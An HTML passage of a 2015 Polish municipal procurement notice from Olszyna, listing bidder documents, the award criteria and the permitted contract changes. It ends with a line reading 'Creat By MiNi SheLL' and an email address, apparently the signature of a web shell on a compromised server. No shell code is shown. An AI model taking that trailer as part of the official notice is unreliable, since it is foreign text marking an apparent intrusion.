<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony i podpisany formularz ofertowy, dowód wpłaty wadium, stosowne pełnomocnictwa, kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej -                        w wyniku niniejszego zamówienia - umowy w stosunku do treści oferty (art. 144 PZP), na podstawie której dokonano wyboru Wykonawcy, w sytuacji konieczności wprowadzenia takich zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiany  te będą korzystne dla Zamawiającego,                                        a w szczególności przewiduje się możliwość dokonania w umowie:
1) zmiany jakości, parametrów lub innych cech charakterystycznych dla przedmiotu zamówienia;
2)  zmianę elementów składowych przedmiotu zamówienia na zasadzie ich uzupełnienia lub wymiany;
3)  zmianę sposobu i terminów dostarczania poszczególnych elementów zamówienia;
4)  zmianę terminu realizacji przedmiotu umowy;
5)  zmianę okresu obowiązywania umowy, w tym w szczególności o czas konieczny dla przeprowadzenia kolejnego przetargu na analogiczny przedmiot zamówienia;
6)   zmiany ceny ofertowej w przypadku zaistnienia urzędowej zmiany stawki podatku VAT, przy zachowaniu jej ceny netto;
Warunkiem dokonania zmian wskazanych powyżej, w szczególności może być:
      1)  nastąpi zmiana organizacyjna po stronie Zamawiającego, w szczególności w zakresie jego organizacji i funkcjonowania;
2)   wymagać tego będzie prawidłowa realizacja przez Wykonawcę zadań objętych realizacją zamówienia;
3)  w wyniku zmiany umowy możliwe będzie podniesienie poziomu/jakości wykonywanych robót; 
4)   będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii;
5)   będzie to konieczne ze względu na zmianę przepisów prawa;
6)   zmiana w inny sposób dostarczy pożytku Zamawiającemu;
7)	działania siły wyższej (np. klęską żywiołowa), mające bezpośredni wpływ na terminowość wykonywania robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.olszyna.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Olszynie
ul. Wolności 6 59-830 Olszyna, budynek B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2015 godzina 09:00, miejsce: Urząd Miejski w Olszynie
ul. Wolności 6 59-830 Olszyna, I piętro, pok. nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com